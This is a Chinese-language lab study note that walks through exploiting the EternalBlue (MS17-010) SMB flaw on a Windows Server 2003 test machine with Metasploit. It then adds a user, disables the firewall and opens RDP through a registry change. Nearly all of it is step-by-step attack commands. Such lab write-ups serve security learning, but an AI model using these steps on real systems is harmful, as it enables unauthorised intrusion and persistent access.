永恆之藍漏洞復現全過程

本文爲學習筆記,僅限學習交流。
不得利用、從事危害國家或人民安全、榮譽和利益等活動。
請參閱《中華人民共和國網絡安全法》

永恆之藍是利用Windows操作系統445端口存在的漏洞進行傳播,並具有自我複製、主動傳播的特性。
基於Windows網絡共享協議進行攻擊傳播的蠕蟲惡意代碼

流程簡介:1、啓動:msfconsole
2、查看可測試漏洞模塊:search ms17
3、使用模塊進行測試:use +模塊名稱
4、添加IP:set rhost ip (查看模塊架構:show options)
5、測試:exploit (或 run)
拿到權限:shell

一、測試準備:
目標機:server 2003
攻擊機:kali

利用Nmap掃描IP ,查看已開啓端口
發現445端口,嘗試進行滲透測試:

在這裏插入圖片描述
二、漏洞測試

1、啓動 msfconsole 命令:msfconsole
(重啓數據庫 命令:service postgresql start)

在這裏插入圖片描述

2、查看合適測試這個漏洞的模塊
命令:search ms17

在這裏插入圖片描述

3、使用模塊進行測試 use + 模塊名稱 (最後一個)
命令:use exploit/windows/smb/ms17_010_psesec

查看攻擊模塊框架:
命令: show options

在這裏插入圖片描述

4、set rhost 添加目標IP
命令:set rhost 192.168.0.13

在這裏插入圖片描述
在這裏插入圖片描述

5、 exploit 開始進行測試
命令: exploit

在這裏插入圖片描述
成功拿到權限
在這裏插入圖片描述

三、Kali操控server 2003

1、添加用戶net user 用戶名 密碼 /add
命令:net user amy 123456 /add

(添加用戶到組:net localgroup 「power user」 用戶名 /add)

在這裏插入圖片描述

查看本地用戶信息:
命令: Net user
確認添加成功

在這裏插入圖片描述
2、關閉防火牆
命令:netsh firewall set opmode mode=disable
在這裏插入圖片描述
查看防火牆狀態:
netsh firewall show state
在這裏插入圖片描述

3、查看開啓的端口
命令:netstat -ano

在這裏插入圖片描述
開啓3389端口
命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

查看 3389 端口
命令:netstat -aon |findstr 「3389」

在這裏插入圖片描述

四、server 2003驗證

在這裏插入圖片描述
在這裏插入圖片描述End!